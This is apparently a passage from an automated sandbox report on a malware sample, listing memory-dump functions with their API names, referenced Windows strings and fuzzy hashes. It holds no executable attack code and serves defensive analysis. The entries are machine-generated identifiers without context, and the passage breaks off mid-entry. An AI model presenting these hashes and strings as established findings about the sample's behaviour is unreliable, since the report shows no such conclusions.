                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Log$RXACT
                                                • API String ID: 2994545307-2401810139
                                                • Opcode ID: 1c12fe9a059541c1db3d8fbe9f6695d1a175559c6fabce1ab9cf60430c6739ca
                                                • Instruction ID: d26550ba8c34def89f5f788e5fb410f208ee2f2d6a70f3e5320e305b7601e28e
                                                • Opcode Fuzzy Hash: 1c12fe9a059541c1db3d8fbe9f6695d1a175559c6fabce1ab9cf60430c6739ca
                                                • Instruction Fuzzy Hash: AE7149B2208345AFD712DF64C880E6BBBE9FF89354F50492DF58596260DB35ED048BA2
                                                Function 1FE4B9DF Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                Download Yara Rule
                                                Strings
                                                • RedirectedKey, xrefs: 1FE4BA8E
                                                • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 1FE4BA44
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                • API String ID: 0-1388552009
                                                • Opcode ID: ca17bfc3a7082228fb25e1d335b419a6edb9c03b09ed5891611706be2ca19321
                                                • Instruction ID: 4a72209ff810ba888bded7142d1d1747dc05f5e9385d1039fdcac753d03f12ad
                                                • Opcode Fuzzy Hash: ca17bfc3a7082228fb25e1d335b419a6edb9c03b09ed5891611706be2ca19321
                                                • Instruction Fuzzy Hash: 7061F4B5C00229EBDF11CF94D888AEEBBB8FF48724F25405AE505E7604D7359A49DFA0
                                                Function 1FD8F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$
                                                • API String ID: 3446177414-233714265
                                                • Opcode ID: e5a67b4743306665896e7db4e714ebf579753cdcccbf70840dabadf6e5a8ff3b
                                                • Instruction ID: 9fa1448ad1b7da9527e06e9609064df2306d23096cfc54cf83bf2cf1481ceca5
                                                • Opcode Fuzzy Hash: e5a67b4743306665896e7db4e714ebf579753cdcccbf70840dabadf6e5a8ff3b
                                                • Instruction Fuzzy Hash: F661C075A0078ADFDBA0CFA4C580BBDB7B1FF48714F1045A9D615AB280DB35B942DB60
                                                Function 1FDF5960 Relevance: 1.7, APIs: 1, Instructions: 246COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01a2610539e7f5b1975c787cc4dea8291bdd770db6e1579d48183fa4f108ae5f
                                                • Instruction ID: c0aea5705f0c2dae69e28bcd3a3bc8eaa199bcd49ea2375246a02ad5f83b8bfd
                                                • Opcode Fuzzy Hash: 01a2610539e7f5b1975c787cc4dea8291bdd770db6e1579d48183fa4f108ae5f
                                                • Instruction Fuzzy Hash: B4813F75A00309AFDB52DFA5CC84FAFBBF8EF89710F510519A516AB190DA70F901CB64
                                                Function 1FD77703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8e18468f09e006ab47049be4dc4ea9f2ae95a00bc0af0b28163565a9be0f62d
                                                • Instruction ID: fc8864c721e7055b7417d8ab38a45668d80662696751bbc31663e2377101c2d6
                                                • Opcode Fuzzy Hash: f8e18468f09e006ab47049be4dc4ea9f2ae95a00bc0af0b28163565a9be0f62d
                                                • Instruction Fuzzy Hash: 9B614F75E00646AFDB48DF78C480AADFBB5BF88314F25866AD419AB340DB30B951CBD0
                                                Function 1FD6B991 Relevance: 1.7, APIs: 1, Instructions: 172COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: _vswprintf_s
                                                • String ID:
                                                • API String ID: 677850445-0
                                                • Opcode ID: 4ba6be46f88cd05fe449e89664f6c4dc61dfef27b1ce19ca947388d9b91c93ac
                                                • Instruction ID: 305034a3b5dd20f7ae46505461f0353d8efd65e5b3d8a7fee699be06ee6a04d0
                                                • Opcode Fuzzy Hash: 4ba6be46f88cd05fe449e89664f6c4dc61dfef27b1ce19ca947388d9b91c93ac
                                                • Instruction Fuzzy Hash: 8361C376D0035A8FEB61CF68CC51BBEBBB0EF05720F1142AED8699B281D7356941DB90
                                                Function 1FD778D9 Relevance: 1.7, APIs: 1, Instructions: 164COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1FD77932
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 885266447-0
                                                • Opcode ID: 0448c315bfdfa31d97883b68bb1f2c1a467987eebdd19a72004953e12b040e72
                                                • Instruction ID: 8fb746e7f5fe50259c87418d8ef7e43dc19542cb5d6c64bdf7c0dcb80810ef2c
                                                • Opcode Fuzzy Hash: 0448c315bfdfa31d97883b68bb1f2c1a467987eebdd19a72004953e12b040e72
                                                • Instruction Fuzzy Hash: FF514A75A08342CFD750CF29C08092BBBE5FB89718F124E6EE5999B350DB31E944CB92
                                                Function 1FE21AA3 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .
                                                • API String ID: 0-248832578
                                                • Opcode ID: 5eee59d8910f36bee7a538f2564b99021de3c5d688019187799fcb2c1fe8c59a
                                                • Instruction ID: 00ab6eaa81281b1535a9c2c116948d4aa6eaaef822954654ac7a344ad0bc2dc6
                                                • Opcode Fuzzy Hash: 5eee59d8910f36bee7a538f2564b99021de3c5d688019187799fcb2c1fe8c59a
                                                • Instruction Fuzzy Hash: D0E17079D002A9CBDB14CFA9C8406ADB7F1FF44714F91415AE885AB290F778EE92CB50
                                                Function 1FD757C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: de8daed6eeb00b2af880fc717dcb3ae8b54349aaa1239b4805ff66b416aa80ce
                                                • Instruction ID: d150493d118ecf5db50e8762e83b9b2999c02f77918169875e7bf012924071fd
                                                • Opcode Fuzzy Hash: de8daed6eeb00b2af880fc717dcb3ae8b54349aaa1239b4805ff66b416aa80ce
                                                • Instruction Fuzzy Hash: C131C339601B46FFD7819B24DA40AA9BBA5FF84344F505129E8458BB90DB30F830CB91
                                                Function 1FDAB970 Relevance: 1.6, APIs: 1, Instructions: 86timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 32d8ff7151ff00c9358dd978c1fd96ea22aeb3a7d5f42e987b2f92fe1761b52f
                                                • Instruction ID: 23f0910e0781b3b9ed21b3aecf4dce127a121f43ae031447d7ef1c6d235dea9f
                                                • Opcode Fuzzy Hash: 32d8ff7151ff00c9358dd978c1fd96ea22aeb3a7d5f42e987b2f92fe1761b52f
                                                • Instruction Fuzzy Hash: 1B31C039201B4ABFCBC18B24CE40AAABB66FF44314F455525EC518BBA1DB31F831CB90
                                                Function 1FD81CC7 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1620e53448840ddc1abfc1e4f9a8f4a5bdac24dc97db73734b8969156c10cc32
                                                • Instruction ID: aeceda7bf3a60d47863bdc5736d5b8e1f3ca5eb12a79a77905f5f99e5f928f85
                                                • Opcode Fuzzy Hash: 1620e53448840ddc1abfc1e4f9a8f4a5bdac24dc97db73734b8969156c10cc32
                                                • Instruction Fuzzy Hash: 21218136701B409FD761CF28C880BAAB7E5FF88714F14496DE5968B7A0EB74B845CB90
                                                Function 1FE45D50 Relevance: 1.6, APIs: 1, Instructions: 77timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: deeff8e59f3d9fc731bc612ef76b2511c0cf2f241425cac6f062be938e461819
                                                • Instruction ID: 3669d815fbdeed3ef7278df1c1975ed5530ed032ea985d4dcdf94df2d15db7e4
                                                • Opcode Fuzzy Hash: deeff8e59f3d9fc731bc612ef76b2511c0cf2f241425cac6f062be938e461819
                                                • Instruction Fuzzy Hash: EC21A136501645EFCF02CF54DD84AAEBBA6FF85704F2500A4E8018B669DB35FD15EB90
                                                Function 1FD8DDB1 Relevance: 1.6, APIs: 1, Instructions: 62timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 275d373184a53dbd70bd23c9f46db65d29c52af0bb1af908338f880b4d60b096
                                                • Instruction ID: e9351f816c4398d8a6419498c422974f716a1b5b8948adebe15e7111bb3b2c8e
                                                • Opcode Fuzzy Hash: 275d373184a53dbd70bd23c9f46db65d29c52af0bb1af908338f880b4d60b096
                                                • Instruction Fuzzy Hash: E9210376A003889FDB928FA8C540BFDBBA5EF05704F0000A9E546AB2D1DB7AAD00C775
                                                Function 1FDF9983 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b2661c2d89be6a46ddca2326922500daf30833179bf818c0168b5cae8e299d0
                                                • Instruction ID: 9f81f7bf2ef9d3e3eb1af7ea548711ee37ff23102c49cdf3145478fa9abaed7b
                                                • Opcode Fuzzy Hash: 0b2661c2d89be6a46ddca2326922500daf30833179bf818c0168b5cae8e299d0
                                                • Instruction Fuzzy Hash: 35E0E532710358AFDB00DB68DC44F9A73ECEB89768F110098F40BDB140D661ED01D640
                                                Function 1FE479BC Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ocessId
                                                • API String ID: 0-2071588557
                                                • Opcode ID: 276340627396c7c10cdc08eb290e13fbf6893cb3cc40fd02d128916f35febff1
                                                • Instruction ID: 1d49ffd093251c7311ccc24d5613e8dad257267c7851dad495b951d4be96df07
                                                • Opcode Fuzzy Hash: 276340627396c7c10cdc08eb290e13fbf6893cb3cc40fd02d128916f35febff1
                                                • Instruction Fuzzy Hash: F4716375940209EFDB41CF94CD80EAEB7B9EF48354F214569E515EB290D731EE01DBA0
                                                Function 1FE1DEB0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                Download Yara Rule
                                                Strings
                                                • System Volume Information, xrefs: 1FE1DEBE
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: System Volume Information
                                                • API String ID: 0-764423717
                                                • Opcode ID: 473a5360b3d43770d6049fba830c5b9550473181490b036b82dae029cae26ac6
                                                • Instruction ID: f78a2f13054b91efd14d74a256865a0beef7fe4d14ca04d323aee6234ed17805
                                                • Opcode Fuzzy Hash: 473a5360b3d43770d6049fba830c5b9550473181490b036b82dae029cae26ac6
                                                • Instruction Fuzzy Hash: 8561AB75108341AFD721DF55CC80E6BB7E9EF88B50F00092DF9859B2A0E675ED44CBA2
                                                Function 1FD7973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                • Instruction ID: 07b93f63177f438fedba805ca4d5fd2142d414aa03219a405522873dfca36839
                                                • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                • Instruction Fuzzy Hash: 53615276D00359ABDF51CFA5C840BEEBBB4FF45715F10426AE811AB290DB74AA01CB61
                                                Function 1FDF3CDB Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CWDIllegalInDLLSearch
                                                • API String ID: 0-473384322
                                                • Opcode ID: a7633c9dc4cae6bce44c53371d4450914e31905434a4b9eb6a458038b837df9f
                                                • Instruction ID: 230756fc293a25db31c931c737671bebdc3f6811307835bf3eb6ac8e69aca642
                                                • Opcode Fuzzy Hash: a7633c9dc4cae6bce44c53371d4450914e31905434a4b9eb6a458038b837df9f
                                                • Instruction Fuzzy Hash: 2451D1B59047429BD350CE24C880F7AB7A8EF44720F030B2DF966D7280DB32E906CB92
                                                Function 1FDFF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                • Instruction ID: 7c6999bbd3baa3207fd0cb6abdc72462ec9347a7e273ce55d00e791a7dd3baa8
                                                • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                • Instruction Fuzzy Hash: AF5199B2514345AFD7528F64C840F6BB7E8FB84750F410A6DF9849B290EBB0E906CBE1
                                                Function 1FDA3EEB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                • Instruction ID: 6f20b1782fb91caa3585b12fab6d078883b1dfeebf47cf34a630051c03cfd800
                                                • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                • Instruction Fuzzy Hash: 97517C765047109FC321CF25C840A6BB7F8FF88710F008A2EF995876A0E7B4E914DBA5
                                                Function 1FDABC3B Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeProcess
                                                • API String ID: 0-2689506271
                                                • Opcode ID: 63aa788cff67519ac1d4cecd7ef7bd7a0b463682865ddffa3322c7e7d9670a54
                                                • Instruction ID: b7e618973600f6a93efe7acbe6a0ff0f094a799f692d9f45bc179c4c52868c9b
                                                • Opcode Fuzzy Hash: 63aa788cff67519ac1d4cecd7ef7bd7a0b463682865ddffa3322c7e7d9670a54
                                                • Instruction Fuzzy Hash: 6C41E47641535AAFD391DFA0C984EBBB7ECEB84720F01492EE1A186180E771E545CFB2
                                                Function 1FDF97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: verifier.dll
                                                • API String ID: 0-3265496382
                                                • Opcode ID: 8bcea19787cc6adde55e1d6d00fec70d930543a6d5f911911ef3476e44efe67c
                                                • Instruction ID: 473056d520ee40a0ebef9fd7b6137cf0c9d1f31b0e85fc8555a1036923768918
                                                • Opcode Fuzzy Hash: 8bcea19787cc6adde55e1d6d00fec70d930543a6d5f911911ef3476e44efe67c
                                                • Instruction Fuzzy Hash: EB318275B103169FD7549F28DCA0F7677E5EB89324F92803AE5469F380E6319C828791
                                                Function 1FD6FF90 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Strings
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1FD70058
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                • API String ID: 0-996340685
                                                • Opcode ID: f868b14d1debce5c6d2ce570f396220b3f17fefd4ec7de47e2c793d5f0acd884
                                                • Instruction ID: 8113823aa41947b65a38d21e4668c81ed9db6cec69beab7cc25059f371bf4371
